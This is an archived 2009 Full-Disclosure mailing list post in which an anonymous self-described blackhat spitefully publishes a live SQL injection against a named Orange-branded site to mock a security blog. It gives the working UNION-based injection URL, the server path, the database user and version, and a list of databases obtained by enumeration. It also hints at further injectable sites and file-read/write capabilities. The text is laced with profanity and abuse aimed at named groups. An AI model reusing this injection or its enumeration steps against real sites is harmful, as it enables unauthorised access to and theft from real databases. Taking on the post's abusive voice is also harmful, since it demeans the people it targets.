Message-Id: <20090528174329.D8E452003F@smtp.hushmail.com>
Date: Thu, 28 May 2009 18:43:29 +0100
From: whitehatscum@...h.ai
To: full-disclosure@...ts.grok.org.uk
Subject: HackersBlog: WhiteHat Scum
NP: Down - Jay Sean ft. Lil Wayne
Right.
--
NOTICE**: THIS IS NOT AN ATTACK ON ORANGE, I'M FED UP WITH
WHITEHAT BASTARDS POSTING ALL THEIR CRAP.
NO-ONE GIVES A FUCK, WE GOT THE POINT, NOW STOP BEFORE YOU PISS
EVEN MORE PEOPLE OFF.
--
I've had enough of your fucking whitehat disclosure, so I'm going to
be disclosing sqls completely irresponsibly, complete with
database dumps, etc etc. Fuck you. Basically the plan was to expose
this bug before you, but it seems another do-gooder was on the
case. Damn. Sucks to be you anyway, I've had this bug for about 3
months. So, basically, I'm going to tell everyone where the fuck
this bug is.
Sorry Orange, anyone affected by this. I guess tonight I let the
kid inside out. Blame HackersBlog.
Fuck you hackersblog, for showing how goddamn bad an sql injection
is.
This server is run by daily.co.uk. YES HACKERSBLOG, IT ISN'T AN
OFFICIAL ORANGE.CO.UK SERVER, AND ISN'T CONNECTED WITH THEIR MAIN
WEBSITE. *shock*
PATH: /disk/home/pointblankftp/orangemixer/mixerweb/
Server info;
DB: orangemixer (NOT FOR LONG, ENUMERATION FTW)
user(): mixer@....30.1.80
Mysql VER: 5.0.32-Debian_7etch1-log
NP: R.O.O.T.S - Flo Rida
mysql.user hashes
Hm... I wonder what DB's we can access......
bikingneeds
epoikcom_pointblankonline
fc_needs
mysql
nocmediawiki
orangemixer
pbmixer
pointbl_shop
pointbl_wrdp1
pointblanklearning
pointblankmusic
schoolsmixer
tamar_blog
teenkmixer
test
thehype
tiberius
tiberius_test
sweet, wow, this sure is a lot more helpful than the whitehat scum
at hackersblog.org make everything
Check out all the admin/user tables. Secure or what?
Btw, HackersBlog.org
your sql injection finding techniques suck balls. I've found better
sqls on sites with LOAD_FILE/OUTFILE that you've posted before, so
really, stop playing 'eleet security guru'.
You fucking suck, you should be ashamed. You aren't hackers, merely
whitehat scum. We need pr0j3c7 m4yh3m back.
Greetz;
The BlackHat Scene, EFnet channels ( you know which chans you are
), certain hackers/groups (again, you know who you are) <3, The
Mentor (dude, your manifesto pretty much describes me perfectly).
Surprisingly, CounterMeasures @ TrendMicro. You seem like a pretty
cool person.
FuckYou;
Skiddie underlings of the net I.E.; unkn0wn.ws, h4cky0u.org (I mean
seriously, d13.0rg), the skids that play with milw0rm web vulns and
think they're the fucking shit. And if you hadn't guessed,
HackersBlog.org (stop acting like you're discovering new stuff).
HackersBlog.org, if you want to email me, please do. Don't expect me
to talk civilly.
By the way, comments such as 'wow, this is childish' etc are
stupid, merely pointing out that you think you are somehow
superior. Trust me, you aren't.
While kids like us are rare, we are around.
Oh yeh, the sql injection.
Wow, this was hard to find.
I muzt be sum kinda pr0 haqqir.
http://mixer.orange.co.uk/explore.php?t=tr&id=-23 UNION ALL SELECT
1-- (btw, this should still be alive....)
Thanks. Pz.
btw;
I'm feeling generous.
Times Online appears to run Oracle, it's rather sexy. I <3
injections in TimesOnline.co.uk. Wonder if you can find it....
Also, you missed other vulns in loads of sites you already
published articles about, but why would I help you? Go find it
yourself. I'll give you a bone, some of them have LOAD_FILE AND
OUTFILE :o:o:o:o:o:o:o:o Maybe you can become a real 'hacker'?
BTW, you suck. I just found another vuln in orange.co.uk, on their
main site. Wow. Not quite as serious as it isn't fully exploitable
(yet, h4h4h), but it is there. I'm not releasing it. I'm not a
disclosing whore that has turned the scene into a business. Scum.
If you want to have a direct conversation, put a few messages in
some major, well known blackhat chans on EFnet. I will message you.
Email me at whitehatscum@...h.ai
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/